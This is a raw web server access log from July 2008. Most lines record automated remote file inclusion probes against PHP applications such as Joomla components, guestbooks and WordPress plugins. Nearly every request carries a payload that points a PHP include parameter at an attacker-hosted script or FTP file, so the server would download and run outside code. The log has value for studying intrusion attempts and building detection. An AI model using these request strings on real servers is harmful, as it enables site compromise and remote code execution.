82.194.86.237 - - [13/Jul/2008:12:16:39 -0700] "GET /logs/?sourcedir=http://artyficio.com/new/it.txt? HTTP/1.1" 200 55993 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:12:16:40 -0700] "GET /logs/administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:12:17:19 -0700] "GET /errors.php?error=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:12:17:20 -0700] "GET /logs/errors.php?error=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:17:20 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.19.6.245 - - [13/Jul/2008:12:17:20 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://correio.fca.unesp.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:17:37 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:17:42 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:17:45 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18517 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:17:45 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18513 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:17:47 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:17:48 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:17:48 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:17:58 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:17:58 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.108.68.3 - - [13/Jul/2008:12:18:21 -0700] "GET /logs/access.log/HTMLSax3.php?dir[plugins]=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.108.68.3 - - [13/Jul/2008:12:18:21 -0700] "GET /HTMLSax3.php?dir[plugins]=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.108.68.3 - - [13/Jul/2008:12:18:21 -0700] "GET /logs/HTMLSax3.php?dir[plugins]=http://www.futuragifts.com/modules/modbanner.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:18:23 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:18:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:18:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.1.115 - - [13/Jul/2008:12:18:23 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:12:18:31 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:12:18:31 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.178.128.116 - - [13/Jul/2008:12:18:46 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [13/Jul/2008:12:18:47 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [13/Jul/2008:12:18:47 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [13/Jul/2008:12:18:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.radio-htrm.de/apache/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:19:05 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.30 - - [13/Jul/2008:12:19:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [13/Jul/2008:12:19:07 -0700] "GET /megumi/minamigrad2k8/IMG_1693.CR2 HTTP/1.1" 200 196608 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:12:19:48 -0700] "GET /logs/access.log/errors.php?error=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:12:19:48 -0700] "GET /errors.php?error=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [13/Jul/2008:12:19:49 -0700] "GET /logs/errors.php?error=http://www.voipanywhere.pt/language/r0x.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:19:51 -0700] "GET /logs/access_071224.log/index.php?content=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:19:54 -0700] "GET /index.php?content=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 200 18409 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:19:56 -0700] "GET /logs/index.php?content=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.29.77.32 - - [13/Jul/2008:12:20:24 -0700] "GET /logs/access_080329.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.29.77.32 - - [13/Jul/2008:12:20:26 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 200 18585 "-" "libwww-perl/5.76" "www.dmulk.com"
81.29.77.32 - - [13/Jul/2008:12:20:26 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:20:55 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:12:20:56 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:20:59 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:21:00 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:21:15 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.140.215 - - [13/Jul/2008:12:21:26 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [13/Jul/2008:12:21:26 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:12:21:32 -0700] "GET /logs/index.php?inc_dir=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:12:21:37 -0700] "GET /index.php?inc_dir=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18399 "-" "libwww-perl/5.803" "www.dmulk.com"
217.64.195.220 - - [13/Jul/2008:12:21:45 -0700] "GET /logs/errors.php?error=http://www.oc12.it/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [13/Jul/2008:12:21:45 -0700] "GET /errors.php?error=http://www.oc12.it/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.219.217.74 - - [13/Jul/2008:12:21:51 -0700] "GET /wp-content/plugins/fgallery/fim_rss.php?album=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.219.217.74 - - [13/Jul/2008:12:21:51 -0700] "GET /logs/wp-content/plugins/fgallery/fim_rss.php?album=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:22:04 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:12:22:05 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:22:06 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:22:07 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:22:07 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:12:22:12 -0700] "GET /logs/index.php?inc_dir=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.26.15.73 - - [13/Jul/2008:12:22:13 -0700] "GET /logs/index.php?option=com_joomla-visiteshttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.134.105.107 - - [13/Jul/2008:12:22:15 -0700] "GET /index.php?inc_dir=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18399 "-" "libwww-perl/5.803" "www.dmulk.com"
81.26.15.73 - - [13/Jul/2008:12:22:17 -0700] "GET /index.php?option=com_joomla-visiteshttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18467 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:22:30 -0700] "GET /logs/errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:22:30 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:22:34 -0700] "GET /logs/middle.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:12:22:34 -0700] "GET /middle.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:22:38 -0700] "GET /index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [13/Jul/2008:12:22:43 -0700] "GET /index.php?canal=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 200 18391 "-" "libwww-perl/5.79" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:22:59 -0700] "GET /logs/index.php?meio.php=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.146.134.209 - - [13/Jul/2008:12:23:05 -0700] "GET /index.php?meio.php=http://steam2k8.st.funpic.de/help01.txt??? HTTP/1.1" 200 18415 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.10.22 - - [13/Jul/2008:12:23:10 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
204.15.10.22 - - [13/Jul/2008:12:23:10 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:12:23:35 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
193.178.228.12 - - [13/Jul/2008:12:23:35 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:12:24:01 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:12:24:01 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:12:24:49 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:12:25:10 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
83.19.144.26 - - [13/Jul/2008:12:25:15 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:25:40 -0700] "GET /logs/access_080329.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:25:44 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18529 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:25:44 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [13/Jul/2008:12:26:05 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [13/Jul/2008:12:26:05 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:26:13 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:26:14 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:26:16 -0700] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:26:21 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:12:26:22 -0700] "GET /main.php?pagina=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:26:23 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:26:26 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.92.250 - - [13/Jul/2008:12:26:33 -0700] "GET /errors.php?error=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:26:39 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:26:39 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:26:46 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.230.204.130 - - [13/Jul/2008:12:26:46 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:12:26:59 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:27:00 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:27:03 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18487 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:27:04 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:12:27:09 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [13/Jul/2008:12:27:10 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:27:15 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:12:27:16 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:12:27:18 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:12:27:19 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=injexhttp://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.29.77.32 - - [13/Jul/2008:12:27:37 -0700] "GET /logs/access_080325.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:27:41 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18515 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.70.18 - - [13/Jul/2008:12:27:42 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [13/Jul/2008:12:27:47 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [13/Jul/2008:12:27:49 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:27:58 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.146.38 - - [13/Jul/2008:12:28:15 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.radio-htrm.de/apache/on.txt?? HTTP/1.1" 200 18511 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:12:28:28 -0700] "GET /logs/access_080329.log/main.php5?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:12:28:33 -0700] "GET /logs/access_080329.log/main.php5?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
